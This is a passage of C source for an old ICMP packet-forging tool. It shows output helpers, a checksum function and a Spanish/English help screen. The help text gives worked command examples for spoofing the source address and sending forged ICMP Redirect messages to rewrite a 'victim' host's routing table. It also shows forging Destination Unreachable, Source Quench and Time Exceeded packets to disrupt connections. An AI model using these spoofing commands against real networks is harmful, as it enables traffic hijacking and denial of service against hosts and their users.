   fprintf(stdout, "       Addr Entry Size = 0x%X %d\n",
                   icmp_rcv->icmp_addr_entry_size);
#endif
                   
   data_rdisc = (struct id_rdiscovery *) &icmp_rcv->icmp_rdiscovery;
   
   for ( entry=1; entry <= icmp_rcv->icmp_num_addr; entry++, data_rdisc++)
       fprintf(stdout, "        %-2d: %s (0x%X)\n", entry,
                        inet_ntoa(data_rdisc->router_addr),
                        data_rdisc->pref_level  );
}



/*****************************/
/* Print an ICMP packet that */
/* not correspond to us ...  */
/*****************************/
void print_err_pack( struct icmp2 *icmp_rcv )
{
#ifdef SPANISH
  char *type = "Desconocido";
#else
  char *type = "Unknown";
#endif
  if ( icmp_rcv->icmp_type <= MAX(icmp_info_or_err) )
     type = icmp_info_or_err[icmp_rcv->icmp_type].name;

#ifdef SPANISH
  fprintf(stdout,"         Tipo = %s (0x%X)\n", type, icmp_rcv->icmp_type);
  fprintf(stdout,"   Cdigo = 0x%-4X  Checksum = 0x%X\n", icmp_rcv->icmp_code,
                  icmp_rcv->icmp_cksum);
  fprintf(stdout,"   Ident. = 0x%-4X   Num_sec = 0x%X\n", icmp_rcv->icmp_id,
                  icmp_rcv->icmp_seq);
#else
  fprintf(stdout, "         Type = %s (0x%X)\n", type, icmp_rcv->icmp_type);
  fprintf(stdout, "   Code = 0x%-4X  Checksum = 0x%X\n",
                   icmp_rcv->icmp_code, icmp_rcv->icmp_cksum);
  fprintf(stdout, "     Id = 0x%-4X      Seq# = 0x%X\n", icmp_rcv->icmp_id,
                  icmp_rcv->icmp_seq);
#endif
}


/***********************/
/* Our SIGALRM handler */
/**********************/
void timeout_func( int nothing )
{
   /* Do nothing ... */
   siglongjmp( myjmp, 1);
}



/**********************************************/
/* This function has been obtained from the   */
/* book "UNIX NETWORK PROGRAMMING" (1st Ed.), */
/* by Richard W. Stevens (Hyper-Guru).        */
/* ;)                                         */
/**********************************************/
int in_cksum( u_short *p, int n)
{
  register u_short answer;
  register long sum = 0;
  u_short odd_byte = 0;

  while( n > 1 )
  {
     sum += *p++;
     n -= 2;
  }
  /* mop up an odd byte, if necessary */
  if( n == 1 )
  {
      *(u_char *)(&odd_byte) = *(u_char *)p;
      sum += odd_byte;
  }

  sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
  sum += (sum >> 16);			/* add carry */
  answer = ~sum;			/* ones-complement, truncate*/
  return (answer);
}


char *pasa( struct sockaddr_in *sin )
{
  return ((char *) inet_ntoa(sin->sin_addr));
}

/***************************************/
/* Exit from program without returning */
/* a system error. The returned code   */
/*  ==  num_error.                     */
/***************************************/
void salir( int num_error )
{
  fprintf(stderr, "%s: %s\n", prog, mensaje_err[num_error][LNG]);
  exit(num_error);
}


/***********************************/
/* Exit from program returning the */
/* system error.                   */
/* Return num_error to the system. */
/***********************************/
void salir_con_error( int num_error )
{
   fprintf(stderr,"%s: %s -> %s\n", prog, mensaje_err[num_error][LNG],
                                                        sys_errlist[errno] );
exit(num_error);
}


/******************************/
/* Macro-help with examples.  */
/* (I hope do you understand) */
/*             C:-)           */
/******************************/
void help(void)
{
  fprintf(stdout,"\n");

#ifdef SPANISH
  fprintf(stdout,"Uso: %s [tipo spoof victim] [timeout] {[gate dest]} {[cod]} {[prot {po pd}|{id sec}]} {[dst_org]}\n\n",prog);
  fprintf(stdout,"    tipo =  -h  Ver ayuda.\n");
  fprintf(stdout,"    tipo =  -v  Ver versin.\n\n");
  fprintf(stdout,"    tipo =  -s  Source Quench.\n\n");
  fprintf(stdout,"    tipo =  -r  Redirect.\n");
  fprintf(stdout,"                 cod =  net       El destino es una red.\n");
  fprintf(stdout,"                        host      El destino es un host.\n");
  fprintf(stdout,"                        serv-net  El destino es tipo de servicio y red.\n");
  fprintf(stdout,"                        serv-host El destino es tipo de servicio y host.\n");
  fprintf(stdout,"                gate =  x.x.x.x  Direccin IP o nombre del host que actuar\n");
  fprintf(stdout,"                                 como gateway en la tabla de rutas.\n");
  fprintf(stdout,"                dest =  x.x.x.x  Direccin IP o nombre del host/red que va\n");
  fprintf(stdout,"                                 a ser el destino en la tabla de rutas.\n\n");
  fprintf(stdout,"    tipo =  -t  Time Exceeded.\n");
  fprintf(stdout,"                 cod =  ttl\n");
  fprintf(stdout,"                        frag\n\n");
  fprintf(stdout,"    tipo =  -d  Destination Unreach.\n");
  fprintf(stdout,"                 cod =  net-unreach\n");
  fprintf(stdout,"                        host-unreach\n");
  fprintf(stdout,"                        prot-unreach\n");
  fprintf(stdout,"                        port-unreach\n");
  fprintf(stdout,"                        frag-needed\n");
  fprintf(stdout,"                        sroute-fail\n");
  fprintf(stdout,"                        net-unknown\n");
  fprintf(stdout,"                        host-unknown\n");
  fprintf(stdout,"                        host-isolated\n");
  fprintf(stdout,"                        net-ano\n");
  fprintf(stdout,"                        host-ano\n");
  fprintf(stdout,"                        net-unr-tos\n");
  fprintf(stdout,"                        host-unr-tos\n");
  fprintf(stdout,"                        com-admin-prohib\n");
  fprintf(stdout,"                        host-precedence-viol\n");
  fprintf(stdout,"                        precedence-cutoff\n\n");
  fprintf(stdout,"    tipo =  -m  Address Mask Request.\n");
  fprintf(stdout,"                timeout = xxx  Timeout de respuestas.\n\n");
  fprintf(stdout,"    tipo =  -p  Timestamp Request.\n");
  fprintf(stdout,"                timeout = xxx  Timeout de respuestas.\n\n");
  fprintf(stdout,"    tipo =  -i  Information Request.\n");
  fprintf(stdout,"                timeout = xxx  Timeout de respuestas.\n\n");
  fprintf(stdout,"    tipo =  -y  Router Solicitation.\n");
  fprintf(stdout,"                timeout = xxx  Timeout de respuestas.\n\n");
  fprintf(stdout,"   spoof =  x.x.x.x  Direccin IP o nombre del host bajo el cual\n");
  fprintf(stdout,"                     nos enmascararemos.\n\n");
  fprintf(stdout,"  victim =  x.x.x.x  Direccin IP o nombre del host al que se le\n");
  fprintf(stdout,"                     enviar el paquete ICMP.\n\n");
  fprintf(stdout,"    prot =  tcp   El tipo de protocolo es TCP.\n");
  fprintf(stdout,"                   po =  xxx  Puerto origen TCP.\n");
  fprintf(stdout,"                   pd =  xxx  Puerto destino TCP.\n");
  fprintf(stdout,"    prot =  udp   El tipo de protocolo es UDP.\n");
  fprintf(stdout,"                   po =  xxx  Puerto origen UDP.\n");
  fprintf(stdout,"                   pd =  xxx  Puerto destino UDP.\n");
  fprintf(stdout,"    prot =  icmp  El tipo de protocolo es ICMP.\n");
  fprintf(stdout,"                   id =  xxx  Identif. de paquete ICMP ECHO.\n");
  fprintf(stdout,"                  sec =  xxx  Num. secuencia de paquete ICMP ECHO.\n\n");
  fprintf(stdout," dst_org =  x.x.x.x  Direccin IP o nombre del host destino al que se\n");
  fprintf(stdout,"                     hace referencia en la entrada Datagrama IP original.\n");
  fprintf(stdout,"                     Por defecto ser el mismo que spoof. Es vlido\n");
  fprintf(stdout,"                     para todos los paquetes salvo para tipo Redirect.\n\n"); 
  fprintf(stdout," Ejemplos:\n\n");
  fprintf(stdout,"  - En respuesta a un paquete enviado con protocolo tcp origen en puerto 100\n");
  fprintf(stdout,"    y destino en puerto 90 se quiere enviar un paquete ICMP Redirect al\n");
  fprintf(stdout,"    host victim.es para alterar su tabla de rutas con los siguientes datos:\n");
  fprintf(stdout,"    Poner como gateway de la ruta el host 10.12.12.12 y como destino de la\n");
  fprintf(stdout,"    ruta el host death.es\n");
  fprintf(stdout,"    Enmascararemos el paquete ICMP como proveniente del host infected.comx\n\n");
  fprintf(stdout,"     icmp -r infected.comx  victim.es  10.12.12.12  death.es  host  tcp 100 90\n\n");
  fprintf(stdout,"  - En respuesta a un paquete ICMP ECHO REQUEST enviado con ECHO REQUEST\n");
  fprintf(stdout,"    id 100 y ECHO REQUEST numero de secuencia 90, queremos enviar un ICMP\n");
  fprintf(stdout,"    Redirect al host victim.es para modificar su tabla de rutas con los\n");
  fprintf(stdout,"    siguientes datos:\n");
  fprintf(stdout,"    Poner al host pizza.death como el gateway de la ruta y al host death.es\n");
  fprintf(stdout,"    como el destino de la ruta.\n");
  fprintf(stdout,"    Enmascararemos el paquete ICMP como proveniente del host infected.comx\n\n");
  fprintf(stdout,"     icmp -r infected.comx  victim.es  pizza.death  death.es  host  icmp 100 90\n\n");
  fprintf(stdout,"  - Se quiere enviar un paquete ICMP Destination unreach al host 10.2.3.4\n");
  fprintf(stdout,"    dicindole que nuestro puerto 2 para el protocolo tcp, relacionado\n");
  fprintf(stdout,"    con su puerto 2100 de tcp, es inalcanzable. Nos enmascararemos como\n");
  fprintf(stdout,"    el host 10.1.1.1\n\n");
  fprintf(stdout,"     icmp -d 10.1.1.1  10.2.3.4  port-unreach  tcp  2100  2\n\n");
  fprintf(stdout,"  - Se quiere enviar un paquete ICMP Destination unreach al host 10.2.3.4\n");
  fprintf(stdout,"    dicindole que el host inferno.hell con puerto 2 para el protocolo tcp,\n");
  fprintf(stdout,"    relacionado con su puerto 2100 de tcp, es inalcanzable. Nos\n");
  fprintf(stdout,"    enmascararemos como si furamos el gateway router.comx\n\n");
  fprintf(stdout,"     icmp -d router.comx  10.2.3.4  host-unreach  tcp  2100  2 inferno.hell\n\n");
  fprintf(stdout,"  - Se quiere enviar un paquete ICMP Source Quench al host ldg02.hell\n");
  fprintf(stdout,"    en respuesta a un paquete destinado a ldg00 con protocolo udp origen\n");
  fprintf(stdout,"    en el puerto 100 y destino en el puerto 200. Nos enmascararemos como\n");
  fprintf(stdout,"    el gateway 10.10.10.1\n\n");
  fprintf(stdout,"     icmp -s 10.10.10.1 ldg02.hell udp 100 200 ldg00\n\n");
  fprintf(stdout,"  - Se quiere enviar un paquete ICMP Time Exceeded al host ldg02.hell\n");
  fprintf(stdout,"    en respuesta a un paquete destinado a ldg00 con protocolo udp origen\n");
  fprintf(stdout,"    en el puerto 100 y destino en el puerto 200. Nos enmascararemos como\n");
  fprintf(stdout,"    el gateway ldg04.hell\n\n");
  fprintf(stdout,"     icmp -t ldg04.hell ldg02.hell frag udp 100 200 ldg00\n\n");
  fprintf(stdout,"  - Enviar un ICMP Address Mask Request y esperar 10 segundos para ver\n");
  fprintf(stdout,"    las respuestas. La IP de spoof ser 10.2.3.4 y el paquete se\n");
  fprintf(stdout,"    enviara a 10.0.1.255\n\n");
  fprintf(stdout,"     icmp -m 10.2.3.4 10.0.1.255 10\n\n");
  fprintf(stdout,"  - Se quiere enviar un ICMP Timestamp Request al host sepultura.hell\n");
  fprintf(stdout,"    La IP de spoof ser 10.2.3.1 (El timeout por defecto para las\n");
  fprintf(stdout,"    son 5 segundos)\n\n");
  fprintf(stdout,"     icmp -p 10.2.3.1 sepultura.hell\n\n");
  fprintf(stdout,"  - Queremos enviar un ICMP Information Request al host nominas.hell\n");
  fprintf(stdout,"    La IP de spoof ser nuestra direccin IP de salida y el timeout\n");
  fprintf(stdout,"    para las respuestas ser 20 segundos.\n\n");
  fprintf(stdout,"     icmp -i 0.0.0.0 nominas.hell 20\n\n");
  fprintf(stdout,"  - Queremos enviar un ICMP Router Solicitation al host vagos.hell\n");
  fprintf(stdout,"    La IP de spoof serl nuestra direccin IP de salida y el timeout\n");
  fprintf(stdout,"    para las respuestas se 20 segundos.\n\n");
  fprintf(stdout,"     icmp -y 0.0.0.0 vagos.hell 20\n\n");  
#else
  fprintf(stdout,"Use: %s [type spoof victim] [timeout] {[gate dest]} {[cod]} {[prot {ps pd}|{id seq}]} {[dst_org]}\n\n",prog);
  fprintf(stdout,"    type =  -h  This help.\n");
  fprintf(stdout,"    type =  -v  Version number.\n\n");
  fprintf(stdout,"    type =  -s  Source Quench.\n\n");
  fprintf(stdout,"    type =  -r  Redirect.\n");
  fprintf(stdout,"                 cod =  net       Destination is a net.\n");
  fprintf(stdout,"                        host      Destination is a host.\n");
  fprintf(stdout,"                        serv-net  Destination is TOS and net.\n");
  fprintf(stdout,"                        serv-host Destination is TOS and host.\n");
  fprintf(stdout,"                gate =  x.x.x.x  IP address or hostname of the gateway on the\n");
  fprintf(stdout,"                                 routing table.\n");
  fprintf(stdout,"                dest =  x.x.x.x  IP address or hostname of the host/net that\n");
  fprintf(stdout,"                                 becomes the destination on the routing table.\n\n");
  fprintf(stdout,"    type =  -t  Time Exceeded.\n");
  fprintf(stdout,"                 cod =  ttl\n");
  fprintf(stdout,"                        frag\n\n");
  fprintf(stdout,"    type =  -d  Destination Unreach.\n");
  fprintf(stdout,"                 cod =  net-unreach\n");
  fprintf(stdout,"                        host-unreach\n");
  fprintf(stdout,"                        prot-unreach\n");
  fprintf(stdout,"                        port-unreach\n");
  fprintf(stdout,"                        frag-needed\n");
  fprintf(stdout,"                        sroute-fail\n");
  fprintf(stdout,"                        net-unknown\n");
  fprintf(stdout,"                        host-unknown\n");
  fprintf(stdout,"                        host-isolated\n");
  fprintf(stdout,"                        net-ano\n");
  fprintf(stdout,"                        host-ano\n");
  fprintf(stdout,"                        net-unr-tos\n");
  fprintf(stdout,"                        host-unr-tos\n");
  fprintf(stdout,"                        com-admin-prohib\n");
  fprintf(stdout,"                        host-precedence-viol\n");
  fprintf(stdout,"                        precedence-cutoff\n\n");
  fprintf(stdout,"    type =  -m  Address Mask Request.\n");
  fprintf(stdout,"                timeout = xxx  Replies timeout.\n\n");
  fprintf(stdout,"    type =  -p  Timestamp Request.\n");
  fprintf(stdout,"                timeout = xxx  Replies timeout.\n\n");
  fprintf(stdout,"    type =  -i  Information Request.\n"); 
  fprintf(stdout,"                timeout = xxx  Replies timeout.\n\n");
  fprintf(stdout,"    type =  -y  Router Solicitation.\n"); 
  fprintf(stdout,"                timeout = xxx  Replies timeout.\n\n");
  fprintf(stdout,"   spoof =  x.x.x.x  IP address or hostname under which we will masquerade\n");
  fprintf(stdout,"                     ourselves.\n\n");
  fprintf(stdout,"  victim =  x.x.x.x  IP address or hostname to who to send the ICMP packet.\n\n");
  fprintf(stdout,"    prot =  tcp   Protocol type is TCP.\n");
  fprintf(stdout,"                   ps =  xxx  TCP source port.\n");
  fprintf(stdout,"                   pd =  xxx  TCP destination port.\n");
  fprintf(stdout,"    prot =  udp   Protocol type is UDP.\n");
  fprintf(stdout,"                   ps =  xxx  UDP source port.\n");
  fprintf(stdout,"                   pd =  xxx  UDP destination port.\n");
  fprintf(stdout,"    prot =  icmp  Protocol type is ICMP.\n");
  fprintf(stdout,"                   id =  xxx  ICMP ECHO packet identifier.\n");
  fprintf(stdout,"                  seq =  xxx  ICMP ECHO packet sequence number.\n\n");
  fprintf(stdout," dst_org =  x.x.x.x  IP address or hostname to that reference in the original\n");
  fprintf(stdout,"                     IP packet entrance becomes.\n");
  fprintf(stdout,"                     By default its the same that spoof. Valid for all\n");
  fprintf(stdout,"                     type of packets except Redirect type.\n\n"); 
  fprintf(stdout," Examples:\n\n");
  fprintf(stdout,"  - In reply to a packet sent with tcp source port 100 and destination\n");
  fprintf(stdout,"    port 90, we want to send an ICMP Redirect to the host victim.es to\n");
  fprintf(stdout,"    modify his routing table with the following data:\n");
  fprintf(stdout,"    Put the host 10.12.12.12 as the route gateway and the host death.es\n");
  fprintf(stdout,"    as the route destination.\n");
  fprintf(stdout,"    We masquerade the ICMP packet as originated from the host infect.comx\n\n");
  fprintf(stdout,"     icmp -r infect.comx  victim.es  10.12.12.12  death.es  host  tcp 100 90\n\n");
  fprintf(stdout,"  - In reply to an ICMP ECHO REQUEST packet sent with ECHO REQUEST id 100\n");
  fprintf(stdout,"    and ECHO REQUEST sequence number 90, we want to send an ICMP Redirect\n");
  fprintf(stdout,"    to the host victim.es to modify his routing table with the following\n");
  fprintf(stdout,"    data:\n");
  fprintf(stdout,"    Put the host pizza.death as the route gateway and the host death.es as\n");
  fprintf(stdout,"    the route destination.\n");
  fprintf(stdout,"    We masquerade the ICMP packet as originated from the host infect.comx\n\n");
  fprintf(stdout,"     icmp -r infect.comx  victim.es  pizza.death  death.es  host  icmp 100 90\n\n");
  fprintf(stdout,"  - We want to send an ICMP Destination unreach packet to the host 10.2.3.4\n");
  fprintf(stdout,"    saying to it that our tcp port 2, related to his tcp port 2100, its\n");
  fprintf(stdout,"    unreachable. We masquerade ourselves as the host 10.1.1.1\n\n");
  fprintf(stdout,"     icmp -d 10.1.1.1  10.2.3.4  port-unreach  tcp  2100  2\n\n");
  fprintf(stdout,"  - We want to send an ICMP Destination unreach packet to the host 10.2.3.4\n");
  fprintf(stdout,"    saying to it that the host inferno.hell with tcp port 2, related to\n");
  fprintf(stdout,"    his tcp port 2100, its unreachable. We masquerade ourselves as the\n");
  fprintf(stdout,"    gateway router.comx\n\n");
  fprintf(stdout,"     icmp -d router.comx  10.2.3.4  host-unreach  tcp  2100  2 inferno.hell\n\n");
  fprintf(stdout,"  - We want to send an ICMP Source Quench packet to the host ldg02.hell in\n");
  fprintf(stdout,"    reply to a packet destined to the host ldg00 with udp protocol, source\n");
  fprintf(stdout,"    port 100 and destination port 200. We masquerade ourselves as the gateway\n");
  fprintf(stdout,"    10.10.10.1\n\n");
  fprintf(stdout,"     icmp -s 10.10.10.1 ldg02.hell udp 100 200 ldg00\n\n");
  fprintf(stdout,"  - We want to send an ICMP Time Exceeded packet to the host ldg02.hell in\n");
  fprintf(stdout,"    reply to a packet destined to the host ldg00 with protocol udp, source\n");
  fprintf(stdout,"    port 100 and destination port 200. We masquerade ourselves as the gateway\n");
  fprintf(stdout,"    ldg04.hell\n\n");
  fprintf(stdout,"     icmp -t ldg04.hell ldg02.hell frag udp 100 200 ldg00\n\n");
  fprintf(stdout,"  - We want to send an ICMP Address Mask Request and wait 10 secs to see\n");
  fprintf(stdout,"    the replies. The spoof will be 10.2.3.4 and the packet goes to\n");
  fprintf(stdout,"    10.0.1.255\n\n");
  fprintf(stdout,"     icmp -m 10.2.3.4 10.0.1.255 10\n\n");
  fprintf(stdout,"  - We want to send an ICMP Timestamp Request to sepultura.hell\n");
  fprintf(stdout,"    The spoof will be 10.2.3.1 (The timeout default is 5 secs)\n\n");
  fprintf(stdout,"     icmp -p 10.2.3.1 sepultura.hell\n\n");
  fprintf(stdout,"  - We want to send an ICMP Information Request to nominas.hell\n");
  fprintf(stdout,"    The spoof will be our IP address and the replies timeout 20 secs.\n\n");
  fprintf(stdout,"     icmp -i 0.0.0.0 nominas.hell 20\n\n");
  fprintf(stdout,"  - We want to send an ICMP Router Solicitation to vagos.hell\n");
  fprintf(stdout,"    The spoof will be our IP address and the replies timeout 20 secs.\n\n");
  fprintf(stdout,"     icmp -y 0.0.0.0 vagos.hell 20\n\n");  
#endif

  fprintf(stdout,"%s\n\n", version);
  exit(0);
} 
